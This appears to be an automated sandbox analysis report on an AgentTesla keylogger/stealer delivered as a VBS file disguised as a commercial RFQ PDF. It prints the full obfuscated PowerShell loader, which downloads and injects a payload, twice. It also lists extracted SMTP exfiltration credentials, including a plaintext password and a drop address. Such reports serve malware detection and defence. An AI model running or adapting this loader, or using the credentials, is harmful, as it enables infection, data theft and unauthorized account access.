Overview

overview

10

Static

static

1

RFQ2024032...df.vbs

windows7-x64

10

RFQ2024032...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28-03-2024 07:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ20240327_Lista comercial_pdf.vbs

  • Size

    38KB

  • MD5

    2e0c2134e45ab06b68e1f2c9eaac7890

  • SHA1

    24d2aa2cb1cc82cbde2f934d49aeedf47c6ba74d

  • SHA256

    de7041f25e9f3a988a90b0fdf1d8e90aa8a6896c594eacba0b0fa1b81eca90dd

  • SHA512

    84d21260a0da041dd391c725b6e9dd96c49dbc4fc9f30303a81e24f4a459b4df34937c608cbbcf32ecfac96983308a4ba91e80c390399d91ea8dd3249b0c4c24

  • SSDEEP

    384:u0ogBz3UIWz0AujGKoCJmMuttrW6ku83V3aiHw2oaXw4Crb8Na/AZrzbtzocLCKV:u0ogBz9WAZGc8NnKwiQQS3AhHtocL3F

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.ispartamensucat.com.tr
  • Port:
    587
  • Username:
    impex@ispartamensucat.com.tr
  • Password:
    Qaz!'2020,

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.ispartamensucat.com.tr
  • Port:
    587
  • Username:
    impex@ispartamensucat.com.tr
  • Password:
    Qaz!'2020,
  • Email To:
    nonewthing9@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ20240327_Lista comercial_pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Crenellated Tovariches Peiktha Jobbedes Tillempe Frynse #>;$Unlaces=(cmd /c set /A 115^^0);Function Gaadefuldere ([String]$Svulstigeres){$Remorselessly=[char][int]$Unlaces+'ubstring';$Spheterize=8;$skrmmiljet=yobbo($Svulstigeres);For($Uudvikledes66=7; $Uudvikledes66 -lt $skrmmiljet; $Uudvikledes66+=$Spheterize){$tisiphone=$Svulstigeres.$Remorselessly.Invoke($Uudvikledes66, 1);$Spaltebeskyttelse=$Spaltebeskyttelse+$tisiphone;}$Spaltebeskyttelse;}function Subsalt ($Tsatlee){. ($Vandlbslov) ($Tsatlee);}function yobbo ([String]$Opvis){$Tulre=$Opvis.Length-1;$Tulre;}$Presentimental=Gaadefuldere ' KlorenTKnowledrS,blimeaSavningn Indlevs FetichfBrevpake vedhefrTam aunrHesseldiBuddlednSprregrgGodfrey ';$Transparente187=Gaadefuldere 'Firdobbh In acct argoletSnotnsepHamam.lsRimes,e:Misansw/Tranqui/UdplacedDigressr Contaiispon.ibv PaleoleBrnesyg.Unbev lgMeasureoSyngespoSpydk,sgAftllinl Mi coneEg,mani. FejlmecFornuftoSund edmVildska/ eflorauOverfavcChlorme?AbstrakeresbevixRechartp Kl reco Taarevr boarsttFiatsfa=Algebr.dHypotheoVorpalawSk.ndalnSmagsd.ldimeranoD.mpmasaAstrolodOmtaag &NonnathiTildragdAkkorda=Ddkedel1PaatageN ,lastiU vertrtWAgnostiuKilomety.olliesQStuccoek Sc,atc6Pic.mnuhBra.gliHcent ifpKommuaaIlmm ludrProgramTCloisonZBagg.arsBa.mandOPhosp.oFretsre -Kl.gere8Svampek2Unco prjSyrntil0Delta,e8 BestikBKroketko Ja berCD,ormanLVandfor5 ExpensuVvensdeiAfvalmeP Mainta ';$Vandlbslov=Gaadefuldere 'Germ.niiKamme,seVarsomsxKonsti, ';$Displaytype=Gaadefuldere 'Fljtetn$ NykkengTandbrslUdfrligoUdviklib pwaysaEnaari,lDescr b: Aabni DYttriume BesmoklCorre,pb Pej koa SidesarKr,santtToleran Aftenkj=Sta,ddr Racon sSVirginitCr.mforaTriumvirSepp oitNonfee,-ServiceBBakkanaiAdamanctBumledes.ucoidaTTopon,rrElskovpaProgramnMenuemns,farligf vergejeAsphyxyrBhutans Ideolog- PodderS Sche,co Ge,rvlu dhamrrSammendcS ndruneAvarici Stenten$HaolesaTSterietrPyrosc,aLymphannAnten.esSty.idipMeltabiaJor,refrmodemkoeEksportn hrombitCi,kusfeForskni1Etaarig8Aptitud7Fr,nskm Putame- KorrigDTastineeMatriars.ransmit tinkiniSymbiotn Skal,eaSupersptPigeon iFluorbeoDadup nnSold ag Rovere$ RensembCuartilrCedr.csi SexologOpp steaLandi,gdAandsfre.onempir Piftesn ukkendealmanaksSpermat ';Subsalt (Gaadefuldere 'Infirmi$Kagerulg TunisilVnneslioCentrifb Toere.aKrftknulFashion:Phenin.bFrontberNoncommiTeachebgDisco ta,ollagid uslinieSirbuskrStryg fnCisterneSknsmndsArm.nic=Motori,$Machinee Or,olunLon,podvTungsin:T.aerfoaMellsmapTrre,nopNerite,d Krav paSympatit Cha piaKell,sm ') ;Subsalt (Gaadefuldere 'TykpandICrizzelm Dendrop Stren.o AngiocrUnflexitUpswe p- MandarMStol.mao v,lgardSurdejeu,rkiball EnhydreOplse,e PueriliBMaryasiiSystemvtAbettors.ygerkuTTrac,marTristeraVictorinfor.ftesPrislisfNei.hboeP.eaffirHalvaks ') ;$brigadernes=$brigadernes+'\Ovens.Buk' ;Subsalt (Gaadefuldere ' Ta tat$ SjlerigBaledcll Bulderobonelesb Drnle,aTelexerlSkovrid: Emb stUPsycoannSlo.coast.iodone SkggesrIndent,aQualitipAmbarelhPharyngiKkkenpecEntitymaAnmeldelSalat,r=Orbated(AnticodT BrnehaeHv,dvinsTrfsi rtroustst-RejsesnPAlamodeaFeltstrtHabilithRe post Wallpie$Under abPillarlr Atommii ud tesgA findeaFlavonodTodelineCastlewrWha parnArb steeU gdomssStrikke)Zetst l ') ;while (-not $Unseraphical) {Subsalt (Gaadefuldere ' tryptaIKingsqufGadeare Opspore(akkorde$Sinu siDa nunciePol.inilServerebMundha.aBru,yierforvandt iltrkk.Extr,gaJMedicinoFortllebGennemkSRevivictChoicieaI jektitSukkerse.ndomes Refl.ct- SmalfieForsk.iqEsc,pin Spotter$SagamorP .fbladr ParticePlasticsBlokopdeE itionnStvningt,uterpeiHolocepmInterloeJugalunnCaliolotUnrefu a ,crodsl Phenac) Glycer .ormula{Phytol S BasotetJes,itia xcerptrDekomprtPlotter-Cu.idsbSGdeudkrlepitapheCastilieDklistepMyxopod Fremhol1 Margin}BilatereComputelJagtssos Bromize,onvivi{TraversSProgramtmuscicoaVil,farrStivkratReap,ea-MedundeSPupaefjlUnimol eTilletiegradualpMmfdmir su.rana1 Tramme; Ba.bitSPegef nuEndeligbInte.ndsKl.vrinaRosinoll Deri,atTonjese Cal.uli$PandabjDSchungii Pol pasForgj rpTelexe.lLeasendaE ucatiytommelftSecreteyMaerkedpUndev leSalamit}Tintabl ');Subsalt (Gaadefuldere 'Vindkra$ Dreyf gHyletonl Skjaldo,oktorgb IndyalaSkjtel.lRislemt:TaimimaUDatauhenDoruckbsSub.isteMasturbrSe dedeaSolbrsap Athe,lhFygesaniSidemancGuldplaaVa,dbyglL,cheni=Cotorob(TemalsnTSynaalmeLadyhoosBestallt Recusi-WorstunP TelefoaForchastRenovathFyldni Contin$DameskrbSelvdisr MaldeviCod.ficg SpookiaPe dunldd aggleeFaldendrRetoldfnKrabberePascalrsLeiophy) Passiv ') ;}Subsalt (Gaadefuldere 'Recauti$RedipsfgCronebelBetal,noRembourbSisefaraRibosomlTurricu:T ldanoGTelescooSagolikdEmotio.kAlk,heseIrresisnLretideds otprieRestrailAndrogysNeocomieBosc nesSandmenmFdi.semySubaquanUnrecogdPachaknitypho,mg FunnymhUnsangueCleaveld,ftrapneUnmeasurSemipernFarvemeeKommuni Mate ia=B,boels onforGBogusaleValrapptBrachia-BrierneCGuvernaoCharlatn A,bifitPistille ebrejdn Kuglelt Inter. Skralds$Ban.forb .ightyrButikkeiMotionlgC,erisha BastardCryptereM crosprkommatenHav.ckieApot,opsVederla ');Subsalt (Gaadefuldere ' Skolem$ Allesjg Oplev lchortleotilhuggb stligeaHa vardl Qualmi:IskoldeD admiur Ketapae F.condjTrfiskeePortugukFunktionWendalla Del,afp Falderslsgnger Egenart=Postver Ovoelli[ HmorroSVurderiyMetodebsEmbra gtHalvhjee Faststm Semifl.Sanja,gC Permano CinnamnConsol.vTrskoeneAnt,nomrNunshiptOpbruds].inligt:I loyal:Kno,pieF Besh,urHoedownoHanrejem AndreaB TrefafaFarinacsSaprofyeRegionp6Spilik 4ForeseeSBenvarmtLiminarrMidstreiN nindenbadegstgBygning(,omials$SneblinGRetrogro Forek.d Transpk MattereOppositn VildfrdstuefugeT.eocollVrvleves FejlsteLarmendsEnjoy,nmCi.eastyPen,elsnSmi,ighdSala,emiFiktiong StormhhUndervieBetweendunenriceAnalyserPersonanNonhazae Bryder)Gennems ');Subsalt (Gaadefuldere 'Yappfly$Uldentpgtryghedl,ochairoUnlawlib opfrinakapel,elamulasf:Du.hgerK TilfluaDrosc,esUnshrews in ulteHudgennrfaglrernafskyd eTorp do Irrec.a=Foderbl aftestn[floriscS Sub.iayKalkvrksKr,gstjtDelphineUnwritem.iceude.TenderiTHearsdieNonplu.xLutheratFlerval.FoundatEGevandtnSpejlincMinarinoHo,nkecdExploriiProjektnSteganogKlingen]brneche:kurumba: ndstifA Fun,stSKivuborC oplrkeIDiminutI Nimro,.,roduktGsamdelee Honorit.skimoeS Platt.t InquisrCasketoiTransisnT,blemogV rdens(Elgkerv$NationaDSindbilrCiv lbeeRepr,dujAnellame Unboldk Eosinlnaplom eaPlimmoupEtrusk s Afsnri)He dric ');Subsalt (Gaadefuldere ' Exig.b$BsseskugS,ayabllRevil mo Kr,sembSpireevaPrgninglCodomin:NabsunsUOpna elnLyg,emnaDuch,ssl Casscal GodskeaelucubryAstragaa evakuebPantefolS.ibbruyMishme =Cataton$AnsttelKRo hetsa .nstersToleransEskimoleEmneomrrT,innesnHandbareEtagesn. DirknisForehamu SprogfbAmowtbesTygningtDy amizrratoloriDampednnGennemfg Adonis(Di,iaap3subvers5Inscrip0dire,yo3Typefou6Misorga6 Thousa, Samd i3Smr ebr1Tegnflg5 Unplac6T.gegan4 Disgra)Interfi ');Subsalt $Unallayably;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:2488
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Crenellated Tovariches Peiktha Jobbedes Tillempe Frynse #>;$Unlaces=(cmd /c set /A 115^^0);Function Gaadefuldere ([String]$Svulstigeres){$Remorselessly=[char][int]$Unlaces+'ubstring';$Spheterize=8;$skrmmiljet=yobbo($Svulstigeres);For($Uudvikledes66=7; $Uudvikledes66 -lt $skrmmiljet; $Uudvikledes66+=$Spheterize){$tisiphone=$Svulstigeres.$Remorselessly.Invoke($Uudvikledes66, 1);$Spaltebeskyttelse=$Spaltebeskyttelse+$tisiphone;}$Spaltebeskyttelse;}function Subsalt ($Tsatlee){. ($Vandlbslov) ($Tsatlee);}function yobbo ([String]$Opvis){$Tulre=$Opvis.Length-1;$Tulre;}$Presentimental=Gaadefuldere ' KlorenTKnowledrS,blimeaSavningn Indlevs FetichfBrevpake vedhefrTam aunrHesseldiBuddlednSprregrgGodfrey ';$Transparente187=Gaadefuldere 'Firdobbh In acct argoletSnotnsepHamam.lsRimes,e:Misansw/Tranqui/UdplacedDigressr Contaiispon.ibv PaleoleBrnesyg.Unbev lgMeasureoSyngespoSpydk,sgAftllinl Mi coneEg,mani. FejlmecFornuftoSund edmVildska/ eflorauOverfavcChlorme?AbstrakeresbevixRechartp Kl reco Taarevr boarsttFiatsfa=Algebr.dHypotheoVorpalawSk.ndalnSmagsd.ldimeranoD.mpmasaAstrolodOmtaag &NonnathiTildragdAkkorda=Ddkedel1PaatageN ,lastiU vertrtWAgnostiuKilomety.olliesQStuccoek Sc,atc6Pic.mnuhBra.gliHcent ifpKommuaaIlmm ludrProgramTCloisonZBagg.arsBa.mandOPhosp.oFretsre -Kl.gere8Svampek2Unco prjSyrntil0Delta,e8 BestikBKroketko Ja berCD,ormanLVandfor5 ExpensuVvensdeiAfvalmeP Mainta ';$Vandlbslov=Gaadefuldere 'Germ.niiKamme,seVarsomsxKonsti, ';$Displaytype=Gaadefuldere 'Fljtetn$ NykkengTandbrslUdfrligoUdviklib pwaysaEnaari,lDescr b: Aabni DYttriume BesmoklCorre,pb Pej koa SidesarKr,santtToleran Aftenkj=Sta,ddr Racon sSVirginitCr.mforaTriumvirSepp oitNonfee,-ServiceBBakkanaiAdamanctBumledes.ucoidaTTopon,rrElskovpaProgramnMenuemns,farligf vergejeAsphyxyrBhutans Ideolog- PodderS Sche,co Ge,rvlu dhamrrSammendcS ndruneAvarici Stenten$HaolesaTSterietrPyrosc,aLymphannAnten.esSty.idipMeltabiaJor,refrmodemkoeEksportn hrombitCi,kusfeForskni1Etaarig8Aptitud7Fr,nskm Putame- KorrigDTastineeMatriars.ransmit tinkiniSymbiotn Skal,eaSupersptPigeon iFluorbeoDadup nnSold ag Rovere$ RensembCuartilrCedr.csi SexologOpp steaLandi,gdAandsfre.onempir Piftesn ukkendealmanaksSpermat ';Subsalt (Gaadefuldere 'Infirmi$Kagerulg TunisilVnneslioCentrifb Toere.aKrftknulFashion:Phenin.bFrontberNoncommiTeachebgDisco ta,ollagid uslinieSirbuskrStryg fnCisterneSknsmndsArm.nic=Motori,$Machinee Or,olunLon,podvTungsin:T.aerfoaMellsmapTrre,nopNerite,d Krav paSympatit Cha piaKell,sm ') ;Subsalt (Gaadefuldere 'TykpandICrizzelm Dendrop Stren.o AngiocrUnflexitUpswe p- MandarMStol.mao v,lgardSurdejeu,rkiball EnhydreOplse,e PueriliBMaryasiiSystemvtAbettors.ygerkuTTrac,marTristeraVictorinfor.ftesPrislisfNei.hboeP.eaffirHalvaks ') ;$brigadernes=$brigadernes+'\Ovens.Buk' ;Subsalt (Gaadefuldere ' Ta tat$ SjlerigBaledcll Bulderobonelesb Drnle,aTelexerlSkovrid: Emb stUPsycoannSlo.coast.iodone SkggesrIndent,aQualitipAmbarelhPharyngiKkkenpecEntitymaAnmeldelSalat,r=Orbated(AnticodT BrnehaeHv,dvinsTrfsi rtroustst-RejsesnPAlamodeaFeltstrtHabilithRe post Wallpie$Under abPillarlr Atommii ud tesgA findeaFlavonodTodelineCastlewrWha parnArb steeU gdomssStrikke)Zetst l ') ;while (-not $Unseraphical) {Subsalt (Gaadefuldere ' tryptaIKingsqufGadeare Opspore(akkorde$Sinu siDa nunciePol.inilServerebMundha.aBru,yierforvandt iltrkk.Extr,gaJMedicinoFortllebGennemkSRevivictChoicieaI jektitSukkerse.ndomes Refl.ct- SmalfieForsk.iqEsc,pin Spotter$SagamorP .fbladr ParticePlasticsBlokopdeE itionnStvningt,uterpeiHolocepmInterloeJugalunnCaliolotUnrefu a ,crodsl Phenac) Glycer .ormula{Phytol S BasotetJes,itia xcerptrDekomprtPlotter-Cu.idsbSGdeudkrlepitapheCastilieDklistepMyxopod Fremhol1 Margin}BilatereComputelJagtssos Bromize,onvivi{TraversSProgramtmuscicoaVil,farrStivkratReap,ea-MedundeSPupaefjlUnimol eTilletiegradualpMmfdmir su.rana1 Tramme; Ba.bitSPegef nuEndeligbInte.ndsKl.vrinaRosinoll Deri,atTonjese Cal.uli$PandabjDSchungii Pol pasForgj rpTelexe.lLeasendaE ucatiytommelftSecreteyMaerkedpUndev leSalamit}Tintabl ');Subsalt (Gaadefuldere 'Vindkra$ Dreyf gHyletonl Skjaldo,oktorgb IndyalaSkjtel.lRislemt:TaimimaUDatauhenDoruckbsSub.isteMasturbrSe dedeaSolbrsap Athe,lhFygesaniSidemancGuldplaaVa,dbyglL,cheni=Cotorob(TemalsnTSynaalmeLadyhoosBestallt Recusi-WorstunP TelefoaForchastRenovathFyldni Contin$DameskrbSelvdisr MaldeviCod.ficg SpookiaPe dunldd aggleeFaldendrRetoldfnKrabberePascalrsLeiophy) Passiv ') ;}Subsalt (Gaadefuldere 'Recauti$RedipsfgCronebelBetal,noRembourbSisefaraRibosomlTurricu:T ldanoGTelescooSagolikdEmotio.kAlk,heseIrresisnLretideds otprieRestrailAndrogysNeocomieBosc nesSandmenmFdi.semySubaquanUnrecogdPachaknitypho,mg FunnymhUnsangueCleaveld,ftrapneUnmeasurSemipernFarvemeeKommuni Mate ia=B,boels onforGBogusaleValrapptBrachia-BrierneCGuvernaoCharlatn A,bifitPistille ebrejdn Kuglelt Inter. Skralds$Ban.forb .ightyrButikkeiMotionlgC,erisha BastardCryptereM crosprkommatenHav.ckieApot,opsVederla ');Subsalt (Gaadefuldere ' Skolem$ Allesjg Oplev lchortleotilhuggb stligeaHa vardl Qualmi:IskoldeD admiur Ketapae F.condjTrfiskeePortugukFunktionWendalla Del,afp Falderslsgnger Egenart=Postver Ovoelli[ HmorroSVurderiyMetodebsEmbra gtHalvhjee Faststm Semifl.Sanja,gC Permano CinnamnConsol.vTrskoeneAnt,nomrNunshiptOpbruds].inligt:I loyal:Kno,pieF Besh,urHoedownoHanrejem AndreaB TrefafaFarinacsSaprofyeRegionp6Spilik 4ForeseeSBenvarmtLiminarrMidstreiN nindenbadegstgBygning(,omials$SneblinGRetrogro Forek.d Transpk MattereOppositn VildfrdstuefugeT.eocollVrvleves FejlsteLarmendsEnjoy,nmCi.eastyPen,elsnSmi,ighdSala,emiFiktiong StormhhUndervieBetweendunenriceAnalyserPersonanNonhazae Bryder)Gennems ');Subsalt (Gaadefuldere 'Yappfly$Uldentpgtryghedl,ochairoUnlawlib opfrinakapel,elamulasf:Du.hgerK TilfluaDrosc,esUnshrews in ulteHudgennrfaglrernafskyd eTorp do Irrec.a=Foderbl aftestn[floriscS Sub.iayKalkvrksKr,gstjtDelphineUnwritem.iceude.TenderiTHearsdieNonplu.xLutheratFlerval.FoundatEGevandtnSpejlincMinarinoHo,nkecdExploriiProjektnSteganogKlingen]brneche:kurumba: ndstifA Fun,stSKivuborC oplrkeIDiminutI Nimro,.,roduktGsamdelee Honorit.skimoeS Platt.t InquisrCasketoiTransisnT,blemogV rdens(Elgkerv$NationaDSindbilrCiv lbeeRepr,dujAnellame Unboldk Eosinlnaplom eaPlimmoupEtrusk s Afsnri)He dric ');Subsalt (Gaadefuldere ' Exig.b$BsseskugS,ayabllRevil mo Kr,sembSpireevaPrgninglCodomin:NabsunsUOpna elnLyg,emnaDuch,ssl Casscal GodskeaelucubryAstragaa evakuebPantefolS.ibbruyMishme =Cataton$AnsttelKRo hetsa .nstersToleransEskimoleEmneomrrT,innesnHandbareEtagesn. DirknisForehamu SprogfbAmowtbesTygningtDy amizrratoloriDampednnGennemfg Adonis(Di,iaap3subvers5Inscrip0dire,yo3Typefou6Misorga6 Thousa, Samd i3Smr ebr1Tegnflg5 Unplac6T.gegan4 Disgra)Interfi ');Subsalt $Unallayably;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:2336
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1620

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        2a73e1515002360b6c26ba64767d90b6

        SHA1

        a35b5a79e29cb739b4070540e80c4191626c5df6

        SHA256

        89ed45146a85036b80be86409c34b12ddbd002389b81c052211b89378b460fc2

        SHA512

        ea03e428a7c149ff1f4b3631890bf73fecc29daf094e75c651a0fd3f0cd0e42291476310a612a1e2cb6ac5e64ba9a263b03b8ea3df5cff841ec345dc59214800

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Cab7CBE.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9UNAGJO9D9RYIYIGENYI.temp
        Filesize

        7KB

        MD5

        878dcd8eea1f9b8f101cb51d36d14ae2

        SHA1

        4bcc118bb029d4a30b3537009bf0b1eddef49598

        SHA256

        346e01f2473293fa74f5367a4084fed8f4b6db5c4736acd74dca024f517919e2

        SHA512

        93378db3290cd7e2928dbba986e3ef1d54cc0a69b8686f02e8d54291158c56673b2b3967314e1c29ddc4c5a6620e9a7213504d8a0950af9a63d6fd62e53f2eba

        Download Submit
      • memory/1620-75-0x000000006EDE0000-0x000000006F4CE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/1620-81-0x000000006EDE0000-0x000000006F4CE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/1620-47-0x00000000775C6000-0x00000000775C7000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1620-48-0x0000000077590000-0x0000000077666000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1620-72-0x0000000077590000-0x0000000077666000-memory.dmp
        Filesize

        856KB

        Download
      • memory/1620-71-0x00000000008D0000-0x0000000001932000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1620-46-0x00000000773A0000-0x0000000077549000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/1620-76-0x00000000008D0000-0x0000000000912000-memory.dmp
        Filesize

        264KB

        Download
      • memory/1620-77-0x0000000024DC0000-0x0000000024E00000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1620-82-0x0000000024DC0000-0x0000000024E00000-memory.dmp
        Filesize

        256KB

        Download
      • memory/1936-30-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-5-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1936-29-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-8-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1936-31-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-32-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-4-0x000000001B330000-0x000000001B612000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/1936-18-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1936-13-0x00000000025B0000-0x00000000025C2000-memory.dmp
        Filesize

        72KB

        Download
      • memory/1936-74-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1936-12-0x0000000002690000-0x00000000026B2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1936-11-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-6-0x00000000022E0000-0x00000000022E8000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1936-7-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-10-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1936-9-0x00000000025D0000-0x0000000002650000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2640-16-0x0000000073240000-0x00000000737EB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2640-45-0x0000000077590000-0x0000000077666000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2640-44-0x00000000773A0000-0x0000000077549000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2640-43-0x0000000005DE0000-0x0000000005EE0000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2640-40-0x00000000020A0000-0x00000000020E0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2640-39-0x0000000006200000-0x000000000B1E7000-memory.dmp
        Filesize

        79.9MB

        Download
      • memory/2640-38-0x0000000005220000-0x0000000005221000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2640-37-0x0000000073240000-0x00000000737EB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2640-73-0x0000000073240000-0x00000000737EB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2640-36-0x00000000020A0000-0x00000000020E0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2640-35-0x0000000073240000-0x00000000737EB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2640-34-0x0000000005DE0000-0x0000000005EE0000-memory.dmp
        Filesize

        1024KB

        Download
      • memory/2640-33-0x00000000020A0000-0x00000000020E0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2640-19-0x00000000020A0000-0x00000000020E0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2640-17-0x00000000020A0000-0x00000000020E0000-memory.dmp
        Filesize

        256KB

        Download